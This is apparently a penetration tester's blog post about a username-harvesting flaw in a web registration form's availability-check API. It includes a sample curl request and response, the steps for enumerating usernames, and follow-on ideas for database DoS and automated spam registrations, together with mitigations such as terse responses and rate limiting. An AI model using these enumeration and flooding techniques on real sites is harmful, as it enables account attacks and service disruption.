Harvesting Usernames from Websites

I am working with a client right now on their Web application. While creating an account to do testing, I noticed a glaring security issue that allows people to harvest usernames. This topic has been covered before, I am still surprised that it keeps popping up around the Web, but this time is a bit different. I should note that the client knows about the issue, but what I want to point out in this article is how insidious the issue becomes.

Let's say that this client has designed their registration form similar to the following image.

From a UX standpoint, the inclusion of the these form elements make sense:

  1. It allows the guest to choose their own username.
  2. It informs the guest that their username is private and will never be shown publicly.
  3. It allows the guest to verify that their username is available, and suggests alternative usernames should theirs be taken.

The issue here is that a user's username is not private, since the "Check Availability" functionality tells the guest if their name has been taken. Thus, through the process of exhaustion, we can see which usernames are available on the system (this is called harvesting).

How Exploitable is This?

Note: I have modified all request/payload/response data for privacy and security.

Since no page refresh happens when the "Check Availability" button is clicked, this tells us that an AJAX call is happening behind the scenes. Yay! Because that means it'll be easier to call (we don't need to worry about setting up nonces and other harnesses in our test).

$ curl -d "name=jeremy" https://www.example.org/api/reserve-name
{"valid": true, "suggestions": ["jeremy790896", "jeremy543343", "jeremy148799"], "inuse": true}

Stop the presses, what is this? The response back from the API call is very detailed and, as a potential attacker, we thank them for it. Dissecting this response:

  • valid: true tells us the username passes validation. Good, because we can now submit various lengths to find out the true minimum and maximum lengths of a username. This narrows down our permutation space.
  • suggestions: [...] tells us other usernames available for reservation. This means these usernames haven't been taken, so we can remove those from the permutation space also. Our space is getting much smaller now.
  • inuse: true tells us that this username is taken by another person and can be used to attack. What it also tells us is that, should we submit a username that does not pass validation, it could also be in use. This may point us to situations where administrators (or other VIPs) receive usernames that cannot be taken by guests who use the public interface.

One other important piece of the puzzle is that, performing multiple API calls never resulted in the security scanners being tripped. I was able to call this API multiple times, at any speed, from the same IP address and was never rejected.

The Payload

First we need to find out what is a valid username. We start with a 1-character username and keep adding more letters to our call until the valid key returns true. This is now our true minimum length 1. Then we keep adding letters to the username until valid returns false. This is our true maximum length.

Now that the attack vectors have been identified, we can script up a payload that will hit the server and harvest the system of its usernames. All we need is a list of common first names, read it into memory and call the API over each item. As the API responds, we store the result of the name and, if it was taken, the suggested names in our database. At a minimum, we only need to search for names whose length matches our valid range that we found previously. Once this process is complete, there should be enough names harvested to begin attacking the login page and submitting common passwords (this part is outside the scope of this article).

Preventing Attacks

Short of removing the ability for a user to check the availability of their username (which would decrease UX), there are a few things that can be done to reduce the number of attack vectors.

First, the response from the API call should only be a yes or no. This tells an attacker very little, because the call could have failed due to validation errors or because the name was already taken.

Do not suggest new usernames. In my experience, people rarely take these usernames anyway, and the algorithms are simply terrible. Primarily, they append a random number to the name you want and that's it.

Always throttle the API requests based on IP address and/or the user agent string. The server should never accept an endless set of requests from the same IP address, nor should it accept a flurry of them without some flagging the client as a possible attacker 2. The best thing to do in this case is to slow down each request the more than come in.

There's Always More to Attack…

Relating to the last point about the lack of request throttling, another thing that this security flaw tells us is that we can effectively DoS the server at all levels. The server must check a data store, somewhere, whether the username submitted has been taken. That's 1 database call. Then the system creates 3 suggested usernames, which it must also check against the database. That's 1 to 3 calls (depending on optimization). Caching would not be advisable here because we want to know, in real-time, whether a username is taken or not. So we know that we are going straight to the database. Thus a simple script that hammers the API endpoint is going to hit the database 2 to 4 times, allowing us to lock up both the web server and the database.

Taking this exploit further, it opens up another attack vector with the creation of spam accounts. Anyone can write up an automation website registration script, but the ability to check whether a username is valid allows the script to create accounts with a near 100% success rate. If one scripts the ability to check an email account for an activation code then follow the link, there is now a way to fully automate registrations. For another client, I wrote a script to show this situation, as they were certain that it couldn't be done (since then, they've started using prevention techniques like CAPTCHAs).

Footnotes

  1. I use the word "true" here because although a minimum and maximum length can be supplied in the HTML or JavaScript, those are both client-side and cannot be trusted to be the correct validation parameters. Only the server will report the true values of these parameters. 

  2. Care should be taken here not to immediately assume an IP address is an attacker. Many networks are behind NATs, meaning there could be multiple distinct computers all showing up to the API server as one IP address. When, for example, students in a classroom all register at the same time, it would look like a DOS attack on a server when it isn't.